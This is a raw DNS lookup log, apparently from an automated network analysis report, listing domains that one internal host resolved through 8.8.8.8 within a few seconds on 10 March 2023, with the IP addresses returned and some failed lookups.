                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.302115917 CET8.8.8.8192.168.2.60x3770No error (0)aiolos-sa.gr188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.302115917 CET8.8.8.8192.168.2.60x3770No error (0)aiolos-sa.gr188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.360841036 CET8.8.8.8192.168.2.60x8bb3No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.360841036 CET8.8.8.8192.168.2.60x8bb3No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.470329046 CET8.8.8.8192.168.2.60xe99eNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.538943052 CET8.8.8.8192.168.2.60xe923No error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.561139107 CET8.8.8.8192.168.2.60x7b67No error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.561139107 CET8.8.8.8192.168.2.60x7b67No error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.561139107 CET8.8.8.8192.168.2.60x7b67No error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.561139107 CET8.8.8.8192.168.2.60x7b67No error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.704024076 CET8.8.8.8192.168.2.60x8c10No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.725596905 CET8.8.8.8192.168.2.60x53abNo error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.760972023 CET8.8.8.8192.168.2.60x806fNo error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.501969099 CET8.8.8.8192.168.2.60x77a1No error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.506048918 CET8.8.8.8192.168.2.60xe99eNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.506083012 CET8.8.8.8192.168.2.60x8bb3No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.506083012 CET8.8.8.8192.168.2.60x8bb3No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.521620989 CET8.8.8.8192.168.2.60x2a54No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.521620989 CET8.8.8.8192.168.2.60x2a54No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.524502039 CET8.8.8.8192.168.2.60xe4cfServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.538075924 CET8.8.8.8192.168.2.60x1c7dNo error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.606601954 CET8.8.8.8192.168.2.60x62aeNo error (0)adventist.ro172.67.183.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.606601954 CET8.8.8.8192.168.2.60x62aeNo error (0)adventist.ro104.21.48.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.648710966 CET8.8.8.8192.168.2.60x7b67No error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.648710966 CET8.8.8.8192.168.2.60x7b67No error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.648710966 CET8.8.8.8192.168.2.60x7b67No error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.648710966 CET8.8.8.8192.168.2.60x7b67No error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.833620071 CET8.8.8.8192.168.2.60xdb5bNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:04.341928959 CET8.8.8.8192.168.2.60x1239No error (0)anduran.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:04.341928959 CET8.8.8.8192.168.2.60x1239No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:04.341928959 CET8.8.8.8192.168.2.60x1239No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:04.341928959 CET8.8.8.8192.168.2.60x1239No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:04.718035936 CET8.8.8.8192.168.2.60x341cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.505810976 CET8.8.8.8192.168.2.60x49d1No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.512790918 CET8.8.8.8192.168.2.60xdc9dNo error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.519277096 CET8.8.8.8192.168.2.60xd9f7No error (0)aiolos-sa.gr188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.519277096 CET8.8.8.8192.168.2.60xd9f7No error (0)aiolos-sa.gr188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.636096001 CET8.8.8.8192.168.2.60x56a9No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.675312042 CET8.8.8.8192.168.2.60x72daNo error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.771555901 CET8.8.8.8192.168.2.60x9142No error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.841403008 CET8.8.8.8192.168.2.60xe4cfServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.842088938 CET8.8.8.8192.168.2.60x341cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.880002022 CET8.8.8.8192.168.2.60x6b45No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.880002022 CET8.8.8.8192.168.2.60x6b45No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.880002022 CET8.8.8.8192.168.2.60x6b45No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.880002022 CET8.8.8.8192.168.2.60x6b45No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.908602953 CET8.8.8.8192.168.2.60xfcadNo error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.966087103 CET8.8.8.8192.168.2.60x92daNo error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.970552921 CET8.8.8.8192.168.2.60x278No error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.987530947 CET8.8.8.8192.168.2.60x7e7aNo error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.989775896 CET8.8.8.8192.168.2.60xc20fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.000077009 CET8.8.8.8192.168.2.60x51b8No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.014774084 CET8.8.8.8192.168.2.60x2223No error (0)envogen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.014774084 CET8.8.8.8192.168.2.60x2223No error (0)envogen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.020953894 CET8.8.8.8192.168.2.60xcc9dNo error (0)webways.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.020953894 CET8.8.8.8192.168.2.60xcc9dNo error (0)webways.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.047049999 CET8.8.8.8192.168.2.60xd11aNo error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.060832024 CET8.8.8.8192.168.2.60x5d42No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.080724001 CET8.8.8.8192.168.2.60xde56No error (0)vfcindia.com68.71.135.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.095443010 CET8.8.8.8192.168.2.60x5f63Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.099387884 CET8.8.8.8192.168.2.60xf44cNo error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.104156017 CET8.8.8.8192.168.2.60xae8fName error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.125081062 CET8.8.8.8192.168.2.60x9fa4No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.136970997 CET8.8.8.8192.168.2.60xb4e6No error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.169037104 CET8.8.8.8192.168.2.60x7de2No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.409245014 CET8.8.8.8192.168.2.60xaa0bNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.457003117 CET8.8.8.8192.168.2.60x3ba1Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.586218119 CET8.8.8.8192.168.2.60xdcb0No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.610205889 CET8.8.8.8192.168.2.60xd03dNo error (0)aiolos-sa.gr188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.610205889 CET8.8.8.8192.168.2.60xd03dNo error (0)aiolos-sa.gr188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.647664070 CET8.8.8.8192.168.2.60x62d6No error (0)geecl.com213.175.217.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.649741888 CET8.8.8.8192.168.2.60x48ecNo error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.650204897 CET8.8.8.8192.168.2.60x4532No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.656039953 CET8.8.8.8192.168.2.60xf10eNo error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.658535004 CET8.8.8.8192.168.2.60xf72No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.674837112 CET8.8.8.8192.168.2.60xc5bdName error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.689364910 CET8.8.8.8192.168.2.60x1cc7No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.739356041 CET8.8.8.8192.168.2.60x7b93Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.837655067 CET8.8.8.8192.168.2.60x289Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.039067984 CET8.8.8.8192.168.2.60xb8e2No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.039829969 CET8.8.8.8192.168.2.60x46faNo error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.053793907 CET8.8.8.8192.168.2.60x39edServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.073944092 CET8.8.8.8192.168.2.60x8d0cNo error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.077008009 CET8.8.8.8192.168.2.60x6477No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.078465939 CET8.8.8.8192.168.2.60x84beNo error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.081868887 CET8.8.8.8192.168.2.60xcb4No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.092427969 CET8.8.8.8192.168.2.60x397Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.131325960 CET8.8.8.8192.168.2.60xb067No error (0)vivastay.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.131325960 CET8.8.8.8192.168.2.60xb067No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.131325960 CET8.8.8.8192.168.2.60xb067No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.131325960 CET8.8.8.8192.168.2.60xb067No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.146327972 CET8.8.8.8192.168.2.60x1a73No error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.176995039 CET8.8.8.8192.168.2.60x3a38No error (0)lyto.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.176995039 CET8.8.8.8192.168.2.60x3a38No error (0)lyto.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.329544067 CET8.8.8.8192.168.2.60x7504Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.358959913 CET8.8.8.8192.168.2.60x8f3Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.369621992 CET8.8.8.8192.168.2.60xc20fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.395179987 CET8.8.8.8192.168.2.60x7c44Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.402245045 CET8.8.8.8192.168.2.60x9709No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.428245068 CET8.8.8.8192.168.2.60x171cNo error (0)juso-gr.ch104.21.50.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.428245068 CET8.8.8.8192.168.2.60x171cNo error (0)juso-gr.ch172.67.163.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.462635994 CET8.8.8.8192.168.2.60xb84fNo error (0)juso-gr.ch104.21.50.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.462635994 CET8.8.8.8192.168.2.60xb84fNo error (0)juso-gr.ch172.67.163.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.470359087 CET8.8.8.8192.168.2.60x597aNo error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.473392010 CET8.8.8.8192.168.2.60x7584Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.476351976 CET8.8.8.8192.168.2.60xe4feNo error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.488181114 CET8.8.8.8192.168.2.60xb175Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.492235899 CET8.8.8.8192.168.2.60xb3aaNo error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.494380951 CET8.8.8.8192.168.2.60x4379No error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.496104002 CET8.8.8.8192.168.2.60xb9c1No error (0)burstner.ru52.50.65.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.497699976 CET8.8.8.8192.168.2.60x42a6No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.517797947 CET8.8.8.8192.168.2.60x4b4fNo error (0)onzcda.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.520996094 CET8.8.8.8192.168.2.60xd0c8No error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.520996094 CET8.8.8.8192.168.2.60xd0c8No error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.520996094 CET8.8.8.8192.168.2.60xd0c8No error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.623403072 CET8.8.8.8192.168.2.60xd64dNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.672910929 CET8.8.8.8192.168.2.60x515dNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.684185982 CET8.8.8.8192.168.2.60xfde9No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.684185982 CET8.8.8.8192.168.2.60xfde9No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.684185982 CET8.8.8.8192.168.2.60xfde9No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.702857018 CET8.8.8.8192.168.2.60x2e2bNo error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.711560011 CET8.8.8.8192.168.2.60x8b0dNo error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.719408035 CET8.8.8.8192.168.2.60x66afNo error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.731785059 CET8.8.8.8192.168.2.60x9635No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.736347914 CET8.8.8.8192.168.2.60x83b6No error (0)vfcindia.com68.71.135.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.742010117 CET8.8.8.8192.168.2.60xe648No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.747980118 CET8.8.8.8192.168.2.60xdf2eNo error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.808609962 CET8.8.8.8192.168.2.60x5c91No error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.808609962 CET8.8.8.8192.168.2.60x5c91No error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.909301043 CET8.8.8.8192.168.2.60x6b03No error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.995182991 CET8.8.8.8192.168.2.60x2035No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.037220955 CET8.8.8.8192.168.2.60x5764No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.042263985 CET8.8.8.8192.168.2.60x8ee8No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.042911053 CET8.8.8.8192.168.2.60xedc5No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.050399065 CET8.8.8.8192.168.2.60xdd54No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.050771952 CET8.8.8.8192.168.2.60x2cefNo error (0)umcor.am188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.050771952 CET8.8.8.8192.168.2.60x2cefNo error (0)umcor.am188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.152621031 CET8.8.8.8192.168.2.60xe378No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.199393034 CET8.8.8.8192.168.2.60x809No error (0)78san.com133.242.15.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.238640070 CET8.8.8.8192.168.2.60x6c98No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.262738943 CET8.8.8.8192.168.2.60xb07cName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.279738903 CET8.8.8.8192.168.2.60x55adNo error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.304007053 CET8.8.8.8192.168.2.60x3064No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.332165956 CET8.8.8.8192.168.2.60x576aName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.389657021 CET8.8.8.8192.168.2.60x7f3cName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.398030043 CET8.8.8.8192.168.2.60x22c8No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.398030043 CET8.8.8.8192.168.2.60x22c8No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.398030043 CET8.8.8.8192.168.2.60x22c8No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.398030043 CET8.8.8.8192.168.2.60x22c8No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.402945995 CET8.8.8.8192.168.2.60x6295No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.402981997 CET8.8.8.8192.168.2.60x6cd2Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.412693977 CET8.8.8.8192.168.2.60x339aNo error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.495008945 CET8.8.8.8192.168.2.60x5314No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.615803003 CET8.8.8.8192.168.2.60x4a8Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.680321932 CET8.8.8.8192.168.2.60xc60bNo error (0)wvs-net.de188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.680321932 CET8.8.8.8192.168.2.60xc60bNo error (0)wvs-net.de188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.718679905 CET8.8.8.8192.168.2.60x9e07No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.740613937 CET8.8.8.8192.168.2.60xa382No error (0)dspears.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.740613937 CET8.8.8.8192.168.2.60xa382No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.740613937 CET8.8.8.8192.168.2.60xa382No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
